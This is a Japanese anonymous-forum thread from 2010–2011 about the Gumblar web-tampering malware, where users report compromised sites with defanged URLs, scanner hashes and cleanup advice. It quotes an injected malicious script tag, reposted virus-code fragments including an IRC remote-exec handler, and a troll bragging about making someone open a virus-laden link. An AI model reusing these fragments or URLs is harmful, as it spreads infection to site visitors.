570名無しさん@お腹いっぱい。:2010/12/01(水) 00:46:22
Windowsにシステム権限を奪取される脆弱性--すでに攻撃も確認
ttp://japan.cnet.com/news/business/story/0,3800104746,20423501,00.htm

Microsoft Windows のRtlQueryRegistryValues() 関数におけるレジストリデータ検証不備の脆弱性
ttp://jvn.jp/cert/JVNVU529673/
>2010年11月29日現在、対策方法はありません。

どうすんだよこれwww
571名無しさん@お腹いっぱい。:2010/12/01(水) 02:21:22
COMODOとかSSMとかで対象のレジストリキーを監視するようにすればよかろう。
572名無しさん@お腹いっぱい。:2010/12/01(水) 08:07:18
Malware Defenderでもいいな
573名無しさん@お腹いっぱい。:2010/12/01(水) 11:23:15
理屈だけの妄言で対処ですかw
574名無しさん@お腹いっぱい。:2010/12/01(水) 11:30:52
↑何も出来ない奴
575名無しさん@お腹いっぱい。:2010/12/01(水) 13:52:52
よくわかんない!悔しい!とりあえず煽っとけ!

…ってことだろw
576名無しさん@お腹いっぱい。:2010/12/01(水) 20:21:59
マスターペニス
577名無しさん@お腹いっぱい。:2010/12/01(水) 23:29:54
java&Flashきればおk、なんて利便性を大きく損なうアホな対策法に比べりゃ
キー監視なんてまだ有情だな
578名無しさん@お腹いっぱい。:2010/12/01(水) 23:30:44
すまんageた
巻き添え規制が長かったもんで・・・
579名無しさん@お腹いっぱい。:2010/12/02(木) 02:37:51
専ブラ使いましょうや
580名無しさん@お腹いっぱい。:2010/12/03(金) 03:10:39
取扱注意

ダイワ包材株式会社
www●daiwa-pf●co●jp/

<script>var QaSehalo=2
<script>function aY
581/名無しさん[1-30] ◆.htmlint.U :2010/12/03(金) 05:00:36
おしんつづくなぁ。。。

>>580
おちゅ。
そこのメアドと鯖缶とおしんとJPCERT/CCとIPAとNTT-CERTにつーほ。
582/名無しさん[1-30] ◆.htmlint.U :2010/12/03(金) 05:50:49
あぁ、「index●html」、「index●htm」、「newpage」とか13ページのほかに
サイト内検索したら、まだいぱーいあたぁ。。。orz.....
583名無しさん@お腹いっぱい。:2010/12/03(金) 15:51:21
取扱注意

絶賛放置中につき再掲載
www●snowfan-mimo●com/area/area-service●asp?sID=500 など

絶賛放置中なゴミサイトは消滅すべき
584名無しさん@お腹いっぱい。:2010/12/03(金) 22:23:52
久々にyoutubeをセーフブラウジングでチェックしたらなんかあるみたいだな
あれはyoutubeの広告のリンク先のサイトでもやられたのか?
585名無しさん@お腹いっぱい。:2010/12/03(金) 22:34:30
586名無しさん@お腹いっぱい。:2010/12/04(土) 01:13:06
FirefoxはAdblock Plusに「http://*.pdf」を放り込んでおけば良い
ゴミだけ蹴って、自分自身でアクセスするものは通してくれるから便利だぞ
587名無しさん@お腹いっぱい。:2010/12/04(土) 10:04:02
>>584
それは初心者の質問スレで聞いた方がよくね?
588名無しさん@お腹いっぱい。:2010/12/05(日) 11:13:06
ここに書くんだからgumbler関係だろう
それを初心者池で蹴るのはこのスレの用途の否定じゃないか?
589名無しさん@お腹いっぱい。:2010/12/05(日) 18:31:05
取扱注意
www48●tok2●com/home/karawasuichi/

・Jsunpack
5f6ec9a74fc14cb25efe818a81cfb9605bda288c

「download●XXXXX●jp/」
※腹筋注意w
590名無しさん@お腹いっぱい。:2010/12/06(月) 19:35:19 BE:351014832-2BP(538)
>>589 上 tok2につーほー
    下 既にドメインパーキングのような
591名無しさん@お腹いっぱい。:2010/12/06(月) 21:56:28
取扱注意

株式会社 電研端子製作所
www●denken-t●co●jp/eng/qa/qa●asp
※初代(?)Gumblar

日本一の幼稚園 日本一の子育てを応援する津久井幼稚園
www●tkg1152●sakura●ne●jp/photo/200709/070907/img13●html
※初代(?)Gumblar

592名無しさん@お腹いっぱい。:2010/12/07(火) 00:17:35 BE:2047584375-2BP(538)
>>591 上 反応なし
   下 反応なし
593/名無しさん[1-30] ◆.htmlint.U :2010/12/07(火) 07:58:39
>>591
乙です。
それぞれつーほしますた。
594名無しさん@お腹いっぱい。:2010/12/07(火) 15:36:54
>>593 過去分も含めて 乙乙

取扱注意
>顛峰グループ(Sofmit Group)は〜〜中略〜〜中国西部においてソフトウェアアウトソーシング業界No.1の企業です。
・求人情報
en●sofmit●com/jp/Career/DetailsSub●aspx

<script src=http://www●errghr●ru/script●js></script>
ウイルスバスターと同じく、下から数えてNo.1ということですねw


>エクセルテンプレート・ワードテンプレート無料ダウンロード
www4●atpages●jp/kaisya/
※旧8080(難読化)
感染率の高い企業のザルPCを「無料」というエサで釣ってトロイ(無料)をバラ撒いてたのかw



どーでも良いけど、禿の検索エンジンが帝國のやつになったら探しにくくなたーよ orz
595/名無しさん[1-30] ◆.htmlint.U :2010/12/07(火) 22:02:39
>>594

上:こちらの環境ではメルが戻ってきます。JPCERT/CCとIPAに気体
下:atpagesとかにつーほ。
596名無しさん@お腹いっぱい。:2010/12/08(水) 23:20:04
ttp://ameblo.jp/prosperprosper/entry-10713430773.html
さすが「ろりぽ」というとこでしょうかね?
597名無しさん@お腹いっぱい。:2010/12/09(木) 20:47:25
マスターペニス
598名無しさん@お腹いっぱい。:2010/12/11(土) 10:12:37
今更かも知れないが
>>5のテンプレに
これも加えようぜ
Exploit - AVG
ttp://linkscanner.explabs.com/linkscanner/default.aspx
599名無しさん@お腹いっぱい。:2010/12/11(土) 11:47:58
600名無しさん@お腹いっぱい。:2010/12/11(土) 19:14:38
firefoxのABPは
ここの対策も有効か
ttp://ponco2garage.blog111.fc2.com/blog-entry-68.html
601名無しさん@お腹いっぱい。:2010/12/11(土) 21:21:29
>>600
2ヶ月くらい寝てたのか?
冬眠するにゃ早過ぎるような気がするが・・

今現在は、どっかのサーバー(特に広告関連)をハクってばら撒くのが主流だから
確実に防ぐ方法というものは存在しない。


どうしてもADPで防ぎたいならhttp://* ←これを入れておけよw
「驚きの白さ」
602名無しさん@お腹いっぱい。:2010/12/12(日) 02:16:00
そういえばmicroadの広告があるサイトを見たら感染したなんて話も前にあったなw
603名無しさん@お腹いっぱい。:2010/12/12(日) 03:40:41
それも>>2-3をきちんとしていれば問題なかったはず。
604名無しさん@お腹いっぱい。:2010/12/12(日) 09:30:41
心配ならadっぽいアドレスをカットしておけよ
605名無しさん@お腹いっぱい。:2010/12/12(日) 10:13:54
>QuickTime 7.6.9
このバージョンじゃないけど、ぜいじゃく性を悪用する処理を
積んだExploitKitが存在するから、入れてるPCは更新必須

>>600
1月に書かれた記事でもう古くて不完全な情報だよん

AdBlockは単に"軽減"という程度のレベル
改竄されるのは何も広告だけでないし
範囲も限定的で、たとえばメールとかIM経由なら出る幕がなし

基本的な対策は>>2-3
これ以上もこれ以下もないん (ゼロデイ攻撃は除く)
606名無しさん@お腹いっぱい。:2010/12/12(日) 19:33:01
とりあえずどっかのサイト行く前に必ずセーフブラウジングに掛ける癖を付ければ良いんじゃないかな
607名無しさん@お腹いっぱい。:2010/12/12(日) 22:54:55
>>606
そんな面倒な事するくらいならGoogle Chrome使えよw
608名無しさん@お腹いっぱい。:2010/12/12(日) 23:01:21
そんなのじゃ無理
Secure Browserが良いよ
609名無しさん@お腹いっぱい。:2010/12/12(日) 23:14:12
>>606
そのセーフブラウジングも「Google は過去 90 日の間、このサイトを巡回していません。」
という場合があるよなw

やっぱりこの場合はは危険かどうかわからないってことなのかな?
610名無しさん@お腹いっぱい。:2010/12/13(月) 16:05:23
OCNからメールが。
自分のWEBサイトがガンブラーに感染してると。
調べてみたらひとつ怪しいファイルがあったので削除。
Windowsのアップデート〜adobe関係までアップデート。
ウイルスソフトでウイルスチェック。
WEBホストのパスワードをすべて変更。

嫌気が刺したんで他のWEBアカウントデータもすべてホスト側から削除。

これでよろしいでしょうか?
611名無しさん@お腹いっぱい。:2010/12/13(月) 16:30:44
webサイトを閉じる。
PCリカバリ。
612名無しさん@お腹いっぱい。:2010/12/13(月) 16:43:03
>>610
> 調べてみたらひとつ怪しいファイルがあったので削除。
このファイルはどうやって持ち込まれたと思ってるの?
それに対する対策はしたの?
613名無しさん@お腹いっぱい。:2010/12/13(月) 17:10:58
クリーンインスコした方が…
614名無しさん@お腹いっぱい。:2010/12/13(月) 17:59:35
>>611
サイトは自分のPCが完全にクリーンな状態になるまで完全閉鎖

感染が疑われるPCは、HDを他のPCに繋いで検査すること
他のPC〜ができないなら迷わずリカバリ

PCがキレイになったら、>>2-3を実施(ずっと継続する)+パスワード変更とか・・

サイトのトップページに【お詫び】を掲載
※閲覧者に対して、感染の有無の確認(ウイルススキャン)をお願いする
615名無しさん@お腹いっぱい。:2010/12/13(月) 18:06:19
>>610
早くHP閉鎖しろカス!!!!!!!!!!!1
616名無しさん@お腹いっぱい。:2010/12/13(月) 18:06:34
>>610
HTMLファイルは手元のファイルとサーバー側で変更がないかちゃんと確認した?
Javaランタイムはアップデートした?
他のすべてのインストールソフトに対してアップデートを確認した?
OSわからんけどWindowsUpdateじゃなくMicrosoftUpdateでやった?
Webアカウントにはフリーメールも含まれてるわけだけどそのへんもパス変えた?
LAN内に他にPCはないの?

ウイルスでウイルスチェックしても意味ないよ
セキュリティ対策ソフトが入ってるなら期限が切れてないことが大前提
617名無しさん@お腹いっぱい。:2010/12/13(月) 19:18:18 BE:1170048454-PLT(18051)
情弱の不幸でメシウマ
618名無しさん@お腹いっぱい。:2010/12/13(月) 20:59:06
ガンブラーに感染しちゃったら、上の方にあった対処法に従ってやるんだろうけど
クリーンインストールやってもだめなんじゃないの?

Cドライブにシステム、データ他はパーティション切るか
別ドライブで「D」以降にって人が多いと思うけど
システムドライブだけきれいになっても
データドライブにWEBのファイルがある人は、
そのドライブに改鼠されたデータが残ってたらどうなるの?
619名無しさん@お腹いっぱい。:2010/12/13(月) 21:40:50 BE:3744154188-PLT(18051)
毎回再インストール
これ最強 しかしHDDがそのうち物故割れるという諸刃の刃
620名無しさん@お腹いっぱい。:2010/12/13(月) 23:26:33
>>618
サーバー側のデータをFTP経由で改竄してるだけだよ
もしローカル側のデータを改ざんされたとしてもそれはバージョン管理ソフトや
バックアップとの差分を見ればわかるとおもう
そういうのがないなら入念に確認して下さいとしかいえん

万が一改ざんデータがローカルに残っててもそれだけではどうにもならない
アップロードされ直してその後も動く状況なら被害者が増えるだけ

>>619
そういうの関係なく壊れるときは壊れます
621名無しさん@お腹いっぱい。:2010/12/14(火) 01:52:43
まだ個人のブログなら改ざんされても見ている人からも報告があるだけ良いな
企業のサイトなんかは連絡しても「何それ?」って返ってくるし
622名無しさん@お腹いっぱい。:2010/12/14(火) 07:40:08
>>620
ローカル保存のHTMLも改竄って記憶があるんだけど、これじゃなかった?
623名無しさん@お腹いっぱい。:2010/12/14(火) 17:35:27
>>610
うーん、できれば感染していた時のaguseの結果が見たかった
624名無しさん@お腹いっぱい。:2010/12/16(木) 13:26:08
マスターペニス
625名無しさん@お腹いっぱい。:2010/12/16(木) 15:51:32
詳しくことはよくわからないけど
puredress●com
626名無しさん@お腹いっぱい。:2010/12/18(土) 21:33:53 BE:2457101276-PLT(18051)
627名無しさん@お腹いっぱい。:2010/12/19(日) 01:01:26
これ良いなw

プロセルピナ・プロジェクト
ttp://www.traceability-center.com/proserpineProject.html
試用版=無期限(一部機能に制限あり)

「プロセルピナ」のAntiAd機能をテストするためのテストページ
ttp://sound.jp/antilink_testpage/cut_jscript_includingEval.html
628名無しさん@お腹いっぱい。:2010/12/20(月) 13:09:26
Google、改ざんされた疑いのあるページに検索結果で警告表示
ttp://internet.watch.impress.co.jp/docs/news/20101220_415942.html
629名無しさん@お腹いっぱい。:2010/12/22(水) 03:21:03
マスターペニス
630名無しさん@お腹いっぱい。:2010/12/22(水) 20:38:22
今youtubeをaguseで見る限りヤバくね?
s0.2mdn●net/879366/flashwright_1_2●js
という奴が見つかるのだが
631名無しさん@お腹いっぱい。:2010/12/22(水) 20:41:09
間違えた、訂正します
s0.2mdn●net/879366/flashwriht_1_2●js
632名無しさん@お腹いっぱい。:2010/12/22(水) 20:44:28
>>631
404
633630:2010/12/22(水) 21:01:29
度々すまない
また間違えた
aguseで見つかったのはこれです
s0.2mdn●net/879366/flashwrite_1_2●js
634名無しさん@お腹いっぱい。:2010/12/22(水) 21:48:16
>>633
どこがヤバイの?
635名無しさん@お腹いっぱい。:2010/12/22(水) 21:50:06
636630:2010/12/22(水) 21:52:54
>>634
『s0.2mdn.net/879366/flashwrite_1_2.js』でググってみると
なんだか危険そうな雰囲気なんだが…
637名無しさん@お腹いっぱい。:2010/12/22(水) 21:59:35
URL手打ちなんてかわいい
638名無しさん@お腹いっぱい。:2010/12/23(木) 00:28:17
>>630-636
これかにゃ?
ttp://forums.liveleak.com/showthread.php?p=882808
>well if you are quick and crank up fiddler and check any of the the flash links
listed at the top out then you will note that a script file from http://s0●2mdn●net/879366/flashwrite_1_2●js
is loaded up and this script includes a function called dclkFlashWrite that simply does
a document.write(script string) that redirects to pre-loader.
(以下略
639名無しさん@お腹いっぱい。:2010/12/23(木) 17:59:43
So-netのセキュリティ通信のサイトって無くなった?
数日前に突然消えて、恐くてアクセス出来ない・・
640名無しさん@お腹いっぱい。:2010/12/23(木) 18:02:01
普通に見られるよ。更新中だったりしたんじゃないの?
641名無しさん@お腹いっぱい。:2010/12/23(木) 19:14:20
>>640
ありがと。
642名無しさん@お腹いっぱい。:2010/12/23(木) 23:14:23 BE:1404058346-PLT(20050)
怖くてアクセス出来ないってかわいいな(笑)
643(VдV) ◆yUyb3Tqn92 :2010/12/26(日) 19:59:03
俺様にウィルス踏まされて怒り狂ってる低脳どもざまあだな
そしてこのスレURL晒しながらも悪用厳禁とか書いてる奴は本当に矛盾してて頭悪いな

(VдV)♪
644(VдV) ◆yUyb3Tqn92 :2010/12/26(日) 19:59:53
いくらネットの法律改正しても
俺様はまだ一度も逮捕されてないお(Vд^)-☆調子に乗り乗りですお!
645名無しさん@お腹いっぱい。:2010/12/27(月) 11:26:21
相手にされてねえw
646名無しさん@お腹いっぱい。:2010/12/27(月) 16:51:33 BE:585024252-PLT(21152)
VIPに釣りリンク貼ってスクリプトでリモホ抜いたりしたことはあるが
他人にウイルスは踏ませたことがないな
647名無しさん@お腹いっぱい。:2010/12/27(月) 23:36:33
>>645
648名無しさん@お腹いっぱい。:2010/12/28(火) 00:18:04
ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1352734298
現在知恵袋では新手の偽セキュリティソフトが大流行していると
各自別IDも総動員して書き込みしてる有名な一派がいるんだけど
ほんとにこいつらがこんなに大騒ぎするようなこと現在起こってるの?
649名無しさん@お腹いっぱい。:2010/12/28(火) 00:48:55
真偽はともかくスレ違いだろ
650名無しさん@お腹いっぱい。:2010/12/28(火) 00:53:25
>>648
そんなリンク見る気にもならないけど実際に発生しているのは事実
651名無しさん@お腹いっぱい。:2010/12/28(火) 11:10:04
>>648
そのグループ回答者たちの各回答見ると「○○さんの〜」みたいに自分たちが発見・紹介してる
みたいな記述してるのが笑えるし少し引いたw
各質問に回答してる解決法もいかにも自分たちだけができるみたいな書き方だしw
別にそんな回りくどいやり方殊更偉そうに別IDまだ作って宣伝しなくても
さっさとバックアップしてリカバリすればいいだけの話じゃねぇ?
652名無しさん@お腹いっぱい。:2010/12/28(火) 14:27:21
>>648
何このキチガイ
これ全部一人の自演?
653名無しさん@お腹いっぱい。:2010/12/28(火) 22:34:57
Security Tool から Security Shield になったみたいね

>>648
改行厨にアフィアドレス誘導ワロタ
654名無しさん@お腹いっぱい。:2010/12/28(火) 22:54:59
>>648
何が最敬礼だよ
キモ過ぎる
655名無しさん@お腹いっぱい。:2010/12/29(水) 09:28:08
マスターペニス
656名無しさん@お腹いっぱい。:2010/12/29(水) 11:03:03
MSEに似た偽セキュリティソフトもあるから具体的な名前すら
出さない注意喚起なんてチェーンメールのデマみたいだ。
657名無しさん@お腹いっぱい。:2010/12/29(水) 19:05:43
ttp●//www●mypondstore●com/?q=on-line_scan

aguseでクロ判定
658名無しさん@お腹いっぱい。:2010/12/30(木) 12:02:28
uemura-bokujyo●co●jp
659名無しさん@お腹いっぱい。:2010/12/30(木) 12:17:10
www●ropponngi●com
www●soyo-pet●com
www●trickys-custom●net
oak-co●net
www●himawarinosato●or●jp
www●soyo-pet●com
www●ltsgo●co●jp
interior-myhouse●com
/royal-cbj●jp
www●paohouse●co●jp
www●yamaharu-tosou●co●jp
motif●jp
satokk●co●jp
660名無しさん@お腹いっぱい。:2010/12/30(木) 20:12:39
>>628
今日知った。google先生さすがだぜ
661名無しさん@お腹いっぱい。:2010/12/31(金) 00:23:52
Gumblar/8080系再始動?
ttp://www.google.com/safebrowsing/diagnostic?site=addonrock●ru&hl=ja
>Google が最後にこのサイトを巡回したのは2010-12-30で、
このサイトで不審なコンテンツが最後に検出されたのは2010-12-30です。

addonrock●ru/(省略)●jsを突いてみた
日本からのアクセス→まったく繋がらない(IP変えても×、国内の串を通しても×)
海外の串→繋がることがあるがファイルは落ちてこなかった
※2回目以降のアクセスは404

Gumblar(.x/亜種)と同じくGeoIPで国ごと蹴ってるのかね?
662(VдV) ◆yUyb3Tqn92 :2011/01/02(日) 09:28:57
作戦通り♪
663名無しさん@お腹いっぱい。:2011/01/02(日) 10:45:08

(VдV)FF14のニコ生でブラクラ踏ませてきた
http://live.nicovideo.jp/watch/co473160

FF14実況中の馬鹿にウィルス入りのブラクラ踏ませた

そのショックで主のPC固まる&主の精神も固まり中

最初は主をフォローしてたリスナーも飽きて他いった

放送の延長(有料)が自動で行われてること判明
つまりPC固まってるのに有料の延長が無駄に使われて生主涙目状態←今ここ


(VДV)ざまああああああああああああああああああ!!!!!!
でへへへ、俺様マジGJでしょ(*VдV*)
664名無しさん@お腹いっぱい。:2011/01/02(日) 11:27:23
>>663 死ねよ
665名無しさん@お腹いっぱい。:2011/01/02(日) 12:30:54
やべぇ…これってGumblarじゃないよな?
ウェブメール使おうと今日見たらこんな風に…。

aguseでは反応無かったし、大丈夫だと良いんだが…。

ttp://exout.net/mail/
666名無しさん@お腹いっぱい。:2011/01/02(日) 12:46:22
>>663
分かったからコテかBeつけて書き込んでよ
667名無しさん@お腹いっぱい。:2011/01/02(日) 13:02:32
>>663
これを見ていた人はウイルス対策の必要性を思い知っただろうな
いつの日かこのような悪事をはたらいても無意味になることを祈ろう
668名無しさん@お腹いっぱい。:2011/01/02(日) 13:16:59
ニコ動利用するときにはメアド取得必要だし
被害届けとかも出せるんじゃない?例え捨てアカでも
669名無しさん@お腹いっぱい。:2011/01/02(日) 22:36:19
マスターペニス
670名無しさん@お腹いっぱい。:2011/01/02(日) 23:46:55
>>665
>>1読めカス
671(VдV) ◆yUyb3Tqn92 :2011/01/03(月) 03:02:55
(VДV)ムハハハハハハハ!
無知が多くて笑えるな(>w<)新年早々上機嫌お☆
672名無しさん@お腹いっぱい。:2011/01/03(月) 04:57:29
>>664>>666-667>>668
ほれ見たことか!
そうやってコテに反応するからまたコテの思い通りになってんだろ!死ね!!!
673名無しさん@お腹いっぱい。:2011/01/03(月) 05:17:51
MSTMP.EXE
とnet-worm.kidoもはやってるよ
ネットワームはkk.zipで駆除できる
http://support.kaspersky.co.jp/faq/?qid=193238801
実はmstmpに感染してたんだ
タスクマネイジャーを起動
プロセスにmstmp.exeを停止
アンチでブート検査、ルート検査を実行
674名無しさん@お腹いっぱい。:2011/01/03(月) 06:46:38
>>673
説明下手だなおい
675名無しさん@お腹いっぱい。:2011/01/03(月) 08:58:41
673みたいにコミュニケーション力が駄目な奴は文章化しても駄目なんだよ
そういう同僚とたまにメールしてるからよくわかる
676名無しさん@お腹いっぱい。:2011/01/03(月) 09:32:52
まあダメな奴ほど自分がダメだって気付かないからな
677名無しさん@お腹いっぱい。:2011/01/03(月) 17:49:19
すごいな
自分の中で勝手に完結しててまったく説明になってない素晴らしい例だ
こういうのって脳の障害じゃないのかな
新年早々良いものを見ることができて感動した
678(VдV) ◆yUyb3Tqn92 :2011/01/03(月) 19:08:58
むしろ、ここでURLの解説してるのって頭が悪い奴ばかりだろ
過去に俺様が指摘したような
悪用厳禁と書きながらhと.だけ外しただけの危険URLひたすら貼ってる馬鹿とか
ウィルス入りサイトのURLを故意に踏ませたら逮捕されるとか思っちゃってる哀れな無知とかな

┐(VДV)┌ 偽善者ほど醜いものはねーぜ!
んな中途半端なことしてねーで、どうせなら悪用推薦!って書くようするか、死ね!
679(VдV) ◆yUyb3Tqn92 :2011/01/03(月) 19:18:13
ウィルスといえば
最近、朝起きると
とても高濃度な痰が出る
恐らくウィルスが含まれているのだろう
それを10階のベランダから吐くのがすっかり日課になってる

何が言いたいのかというとだ
俺様はウィルスを踏ませることもあれば降らせることも・・ry

Σ(VДV )\(>w<)ったねぇよ!
680(VдV) ◆yUyb3Tqn92 :2011/01/03(月) 19:19:12
おW
680じゃん
数字の8が大好きおヽ(VдV)ノおっおW
681名無しさん@お腹いっぱい。:2011/01/04(火) 07:27:52
>>679
やべ・・ちょっと面白いと思っちまったじゃねーか!
高速道路でコンクリート上から落としてきた!って書いたら通報もんだけど
痰の場合はどうなんだろうなwwww
682名無しさん@お腹いっぱい。:2011/01/04(火) 08:21:08
マスターペニス
683名無しさん@お腹いっぱい。:2011/01/04(火) 12:01:28
>>681
たんじゃなく精子だったら通報だろ
684名無しさん@お腹いっぱい。:2011/01/04(火) 17:37:12
こういうクソコテがある日突然音沙汰なくなったりするんだよな
面白いなあ
685名無しさん@お腹いっぱい。:2011/01/04(火) 19:50:16
4 :z:2010/08/28(土) 10:25:02 ID:NtVfNVmU0
452 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:53:49.30 ID:7Cr427LS0
>>440
・プロバイダの新しい有料メールアドレス
・ジャパンネットバンク銀行の使い捨て番号のVISAデビット
ニ.フ.ティ.ーの100円のメアドプラスで認証が通った。
認証できたら、メアドプラスは登録解除してOK。
普通のクレジットカードでは漢字の住所が登録できたが、
ジャパンネットバンク銀行のVISAデビットだとローマ字入力の住所を要求された。

ローマ字の書き方はこれ
ヘボン式ローマ字綴方表
http://www.seikatubunka.metro.tokyo.jp/hebon/

漢字住所でどんな順序でどんなローマ字、番地の番号を使ったかは、
メモ帳でメアド・パスワードと一緒に控えておいたほうがいい。
453 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:55:00.00 ID:t966sYmN0
ローマ字変換
eip=eip+unescape("%u7030%u4300")
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
http://www2u.biglobe.ne.jp/~yuichi/rest/kanarome.html
454 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:56:54.59 ID:qfPgiwgp0
●買うなんて荒らしと一緒だぞ
455 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:58:50.21 ID:d455Pgrw0
荒らしが運営に喧嘩売っても被害を被るのは巻き添え食らってる人だけっていう…
荒らしたもん勝ち
456 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:58:54.30 ID:sPPrGi160
荒らしが●を買ったんだとしたら、個人情報登録してるんじゃないのか?
それで同一名義のアカウント全部停止するとか、
新たに買おうとしてきても拒否するというのはできないんだろうか?
686名無しさん@お腹いっぱい。:2011/01/05(水) 01:35:43 BE:3159129896-PLT(21389)
擁護認定の流れが始まるのか
胸薄
687(VдV) ◆yUyb3Tqn92 :2011/01/06(木) 11:22:14
(VдV)お前ら煽りに耐性ねーのな
自分で言うのもなんだけどコテにも耐性ねーだろお前ら
俺様の狙い通りの反応なんだもーん♪(VдV三VдV)だもーん♪
気持ち悪いPCおたくでしかもおっさんなお前らだからしゃーないか(>w<)プクススススwww
688(VдV) ◆yUyb3Tqn92 :2011/01/06(木) 11:23:14
>>688
(>w<)8が二つで!ラッキーん☆
689(VдV) ◆yUyb3Tqn92 :2011/01/06(木) 11:30:06
88をゲットしたので久々にこの顔登場

      ∞
   8VдV8 !?
690名無しさん@お腹いっぱい。:2011/01/06(木) 20:52:24
NHK教育 23:30
ITホワイトボックス2選 脅威ガンブラーウイルスの正体▽感染拡大の謎▽対策は?
691名無しさん@お腹いっぱい。:2011/01/08(土) 15:54:22
株式会社GENO - ECサイト運営スタッフ募集
http://www.find-job.net/list/j83468.html?from=23
692ひみつの検疫さん:2024/12/20(金) 16:22:14 ID:MarkedRes
汚染を除去しました。
693名無しさん@お腹いっぱい。:2011/01/12(水) 14:11:10
やめろや
694名無しさん@お腹いっぱい。:2011/01/12(水) 19:25:16
★110112 news ウイルスコード「Scriptini」マルチポスト荒らし報告
http://qb5.2ch.net/test/read.cgi/sec2chd/1294815235/

ソースコード流出の件でウイルスコード等の書き込み制限機能を止めてるんだな
695/名無しさん[1-30] ◆.htmlint.U :2011/01/13(木) 14:59:34
ダンさん落ちてる。。。orz....
696名無しさん@お腹いっぱい。:2011/01/20(木) 19:53:56
2chハックの件以降、キチガイを見ないな…
697名無しさん@お腹いっぱい。:2011/01/22(土) 12:21:49
Gumblarももう終わりか、つまんないな
698/名無しさん[1-30] ◆.htmlint.U :2011/01/23(日) 06:28:39
あるっぽい。
Received 2011-01-19 11:54:20
JSUNPACK
8fa8604f9abcf13ca0abe8775cdad54cad50d4a1


VIRUSTOTAL順番待ち7000番台ってどーよ。。。
699名無しさん@お腹いっぱい。:2011/01/24(月) 13:26:14
てす
700名無しさん@お腹いっぱい。:2011/01/24(月) 14:02:35
>>698
malware作者が妨害のためにゴミ投げまくったんでしょ
701:2011/01/25(火) 14:52:53
ウイルスサイトのURL貼ってくんない?
まぢウイルスかかってみたいんだけどさぁ www
702名無しさん@お腹いっぱい。:2011/01/25(火) 15:30:56
703名無しさん@お腹いっぱい。:2011/01/25(火) 16:03:05
643 名前:名無したちの午後[sage] 投稿日:2011/01/25(火) 04:49:34 ID:ATQNV0HP0 [1/5]
1・24学習会 私たちの言論・表現活動の自由が危ない!
すべてのインターネット通信が監視される?
「コンピュータ監視法」とは何か
なぜ、ウィルス作成罪・コンピュータ監視法に反対するのか
 法務省は、今通常国会にウィルス作成罪をふくむコンピュータ監視法を提出しようとしています。
 共謀罪は法律に違反することを実際に行わなくとも、話しあうだけで処罰するものですが、
コンピュータ監視法の中のウィルス作成罪は、同じようにそれが使用もされていない、ウィルスかどうかもわからないプログラム作成の段階で処罰しようとするものです。
そのためには、インターネットによる私たちの通信のすべてが監視されることになるでしょう。
共謀罪とコンピュータ監視法は、いずれも言論・表現行為の段階で、市民に対する監視を強め、規制しようという狙いで一致しています。
コンピュータ監視法には、捜査当局が裁判所の令状もとらずに、プロバイダーなどにパソコン、
携帯電話のメールやホームページへのアクセスなどの通信履歴を90日間保全要請できるという規定もあります。
 コンピュータは現在市民にとって必要不可欠な通信手段となっています。
この法案ができれば、通信の秘密が侵害され、市民の自由な言論・表現
 活動が規制されて、民主主義を危うくするでしょう。
 学習会で詳しく学び、コンピュータ監視法の国会提出に反対しましょう。お誘いあわせてご参加ください。
■と き 1月24日(月)午後6時30分〜
■ところ かながわ県民センター709号室
(横浜駅西口から徒歩5分、ヨドバシ・カメラ裏)
地図 http://www.pref.kanagawa.jp/osirase/02/0051/center/access.html
■お話し 山下 幸夫さん(弁護士)
「なぜ、ウィルス作成罪・コンピュータ監視法に反対するのか」
■参加費 500円
■主 催 盗聴法に反対する市民連絡会
連絡先 日本消費者連盟 Tel.03-5155-476 5
ネットワーク反監視プロジェクト Tel.070-5553-549 5
704名無しさん@お腹いっぱい。:2011/01/25(火) 16:03:45
644 名前:名無したちの午後[sage] 投稿日:2011/01/25(火) 04:49:58 ID:ATQNV0HP0 [2/5]
110124コンピュータ監視法学習会
iwakamiyasumi on USTREAM: フリージャーナリスト・岩上安身が、どこにでも出かけて、誰にでも取材し、可能な限り、ダイレクトに情報をお伝えします。インタビュー、対談、記者会見、などなど。. ...
http://www.ustream.tv/channel/iwakamiyasumi
【録画配信中】私たちのインターネット通信を監視する「コンピュータ監視法」とは何か1/24(月) | PortSideStation
http://portside-station.net/2011/01/23/6859/
Togetter - 「コンピュータ監視法学習会tudaりまとめ」
http://togetter.com/li/92712
神奈川県横浜市神奈川区鶴屋町2-24-2 - Google マップ - かながわ県民センター
http://maps.google.com/maps?ja&channel=suggest&q=%E7%A5%9E%E5%A5%88%E5%B7%9D%E7%9C%8C%E6%A8%AA%E6%B5%9C%E5%B8%82%E7%A5%9E%E5%A5%88%E5%B7%9D%E5%8C%BA%E9%B6%B4%E5%B1%8B%E7%94%BA2-24-2

第171回国会 議案の一覧
http://www.shugiin.go.jp/itdb_gian.nsf/html/gian/kaiji171.htm
法務省:第163回国会(特別会)提出主要法律案
http://www.moj.go.jp/houan1/houan_houan34.html
法務省を対ウイルス法案で突っついてみました
http://angels-pathway.clanteam.com/qa_houmu_antiviruslaw_100818.html

サイバー犯罪条約
http://www.mofa.go.jp/mofaj/gaiko/treaty/treaty159_4.html
705名無しさん@お腹いっぱい。:2011/01/25(火) 16:04:31
|1・25コンピュター監視法学習会のご案内
|カテゴリ : 監視社会
執筆 : toshi 2010-1-6 3:32

 以下のような学習会を開きます。東京都がネットカフェ規制の強化を条例化しようとするなど自治体レベルでのネット監視がじわじわと進んでいる。
コンピュータ監視法案は共謀罪とともに繰り返し廃案になっているが、共謀罪ほど反対運動の焦点にはなってこなかった。
しかし、民主党政権はとりあえず共謀罪については、法案の提出の動きは見えないが、
コンピュータ監視法案は共謀罪から切り離しての提案もありえないわけではない。油断は禁物というのが現状だということを知ってほしい。

1・25コンピュター監視法学習会のご案内

コンピュータの規制が犯罪対策を理由に年々強化されてきています。こうした
動きを一挙に加速させると考えられているのが、サイバー犯罪条約批准のため
の国内関連法の整備を理由としてだされたコンピュータ監視法です。
コンピュータ監視法の性格は、共謀罪新設法案とともに一体のものとして「刑
法等の一部改正案」としてだされたところに鋭く示されています。
いまやコンピュータは市民の日常生活にとってなくてはならない通信手段です。
